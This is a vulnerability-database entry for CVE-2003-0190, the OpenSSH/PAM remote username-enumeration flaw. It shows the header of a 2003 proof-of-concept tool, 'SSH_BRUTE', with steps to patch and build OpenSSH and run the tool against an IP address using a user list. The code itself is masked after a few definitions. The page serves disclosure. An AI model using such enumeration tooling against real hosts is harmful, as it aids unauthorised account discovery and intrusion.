OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool

基本字段

漏洞编号:
SSV-15233
披露/发现时间:
未知
提交时间:
2003-04-30
漏洞等级:
漏洞类别:
远程溢出
影响组件:
OpenSSH
漏洞作者:
未知
提交者:
Knownsec
CVE-ID:
CVE-2003-0190
CNNVD-ID:
CNNVD-200305-021
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得   0.5KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
/*
* SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
* Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved
*
*
* Vulnerability discovered by Marco Ivaldi <raptor@mediaservice.net>
* Proof of concept code by Maurizio Agazzini <inode@mediaservice.net>
*
* Tested against Red Hat, Mandrake, and Debian GNU/Linux.
*
* Reference: http://lab.mediaservice.net/advisory/2003-01-openssh.txt
*
* $ tar xvfz openssh-3.6.1p1.tar.gz
* $ patch -p0 <openssh-3.6.1p1_brute.diff
* patching file openssh-3.6.1p1/ssh.c
* patching file openssh-3.6.1p1/sshconnect.c
* patching file openssh-3.6.1p1/sshconnect1.c
* patching file openssh-3.6.1p1/sshconnect2.c
* $ cd openssh-3.6.1p1
* $ ./configure
* $ make
* $ cc ../ssh_brute.c -o ssh_brute
* $ ./ssh_brute 1 list.txt 192.168.0.66
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
/* an illegal user */
#define NO_USER "not_val_user"
/* path of the patched ssh */
#define PATH_SSH "./ssh"
/* max time range for invalid user */
#define TIME_RANGE 3
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

HHMA 共 5 兑换

参考链接

解决方案

临时解决方案

官方解决方案

升级到最新无漏洞版本

防护方案

人气 1398
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负